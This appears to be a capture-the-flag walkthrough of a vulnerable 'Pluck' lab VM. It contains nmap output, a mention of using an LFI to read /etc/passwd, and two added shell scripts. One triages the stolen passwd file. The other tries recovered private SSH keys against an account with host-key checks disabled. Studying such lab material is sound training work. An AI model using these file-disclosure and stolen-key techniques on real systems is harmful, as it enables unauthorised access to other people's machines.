To start things off, let's run an nmap scan against the target (this VM prints its assigned IP address above the login prompt):


Nmap scan report for 192.168.110.129
Host is up (0.00014s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  llmnr?

The most interesting thing here is the http port. Let’s have a look:

We're presented with an index page carrying the title of the VM. There isn't much of interest on the different pages, so I run wfuzz against the site to see if anything is hiding:

So now we've got several users: root, bob, peter, paul and, most interesting of them, backup-user. The backup-user entry in the passwd file carries the full path to a script, so let's see if we can grab that script with the LFI:
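A quick way to triage a passwd file pulled back through an LFI, as an added example rather than anything from the original writeup: flag accounts whose login shell is neither a normal shell nor a standard no-login stub (those are usually custom scripts worth reading), and list the accounts that can actually log in. The sample passwd below is constructed; only the usernames match the page, and the UIDs, home directories and the backup script path are assumptions.

```shell
#!/bin/sh
# Added example: triage an /etc/passwd pulled through an LFI.
# The sample below is constructed; only the usernames come from the writeup.
# UIDs, home directories and the backup script path are assumptions.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:peter,,,:/home/peter:/bin/bash
paul:x:1002:1002:paul,,,:/home/paul:/bin/bash
backup-user:x:1003:1003:backup user:/backup:/usr/local/scripts/backup.sh'

# Accounts whose login shell (field 7) is neither a normal shell nor a
# standard no-login stub. Anything else is usually a custom script, which is
# exactly the kind of file worth reading through the LFI.
# Reads passwd on stdin, prints "user shell" per match.
odd_shells() {
    awk -F: '
        $7 != "/bin/bash" && $7 != "/bin/sh" && $7 != "/bin/dash" &&
        $7 != "/usr/sbin/nologin" && $7 != "/sbin/nologin" &&
        $7 != "/bin/false" && $7 != "/usr/bin/false" && $7 != "/bin/sync" {
            print $1, $7
        }'
}

# Accounts that get a real interactive shell: the candidates for SSH key
# reuse or password guessing. Reads passwd on stdin, prints one user per line.
login_users() {
    awk -F: '$7 == "/bin/bash" || $7 == "/bin/sh" || $7 == "/bin/dash" { print $1 }'
}

echo "== non-standard login shells =="
printf '%s\n' "$SAMPLE_PASSWD" | odd_shells
echo "== interactive accounts =="
printf '%s\n' "$SAMPLE_PASSWD" | login_users
```

Against a real target, replace the constructed sample with the body of the LFI response (for example `curl -s` of the vulnerable URL piped into `odd_shells`).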

It looks like bob has sudo privileges and paul has a bunch of public/private SSH keys. Since we have no way into bob's account for the moment, our only other option is to try logging in as paul with the keys we've got. After a "chmod 700" on the files in this directory (ssh refuses to use a private key that is group- or world-readable, so 600 would also do), we finally get in with id_key4 using the following command:
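The same key trial written as a loop, as an added example and not the writeup's own command: it fixes the permissions on every private key in a recovered directory and tries each one against the account, reporting the first the server accepts. It assumes the keys were copied to a local directory; the `SSH_CMD` override is there so the loop can be dry-run against a stub without a reachable target.

```shell
#!/bin/sh
# Added example: try every private key from a recovered directory against one
# SSH account and report the first one the server accepts. The account, host
# and directory are passed in; nothing here is the writeup's own command.

# Usage: try_keys USER HOST KEYDIR
# Prints the path of the first working key and returns 0; returns 1 if none
# worked. SSH_CMD may be overridden (for example with a stub function) to
# dry-run the loop without a reachable target.
try_keys() {
    user=$1; host=$2; dir=$3
    for key in "$dir"/*; do
        [ -f "$key" ] || continue
        case "$key" in *.pub) continue ;; esac   # skip the public halves
        # ssh ignores a private key that is group- or world-readable,
        # so 600 (owner read/write) is enough; 700 also works.
        chmod 600 "$key"
        # BatchMode: never fall back to a password prompt. IdentitiesOnly:
        # offer only this key, so an agent-held key cannot mask the result.
        if ${SSH_CMD:-ssh} -i "$key" \
               -o IdentitiesOnly=yes -o BatchMode=yes \
               -o StrictHostKeyChecking=no -o ConnectTimeout=5 \
               "$user@$host" true 2>/dev/null; then
            printf '%s\n' "$key"
            return 0
        fi
    done
    return 1
}

# Run directly:  sh try_keys.sh paul 192.168.110.129 ./paul_keys
if [ $# -ge 3 ]; then
    if found=$(try_keys "$1" "$2" "$3"); then
        echo "working key: $found"
    else
        echo "no key accepted for $1@$2" >&2
        exit 1
    fi
fi
```

The `true` remote command keeps a successful probe from dropping you into a session; once the loop names the key, connect normally with `ssh -i <key> user@host`.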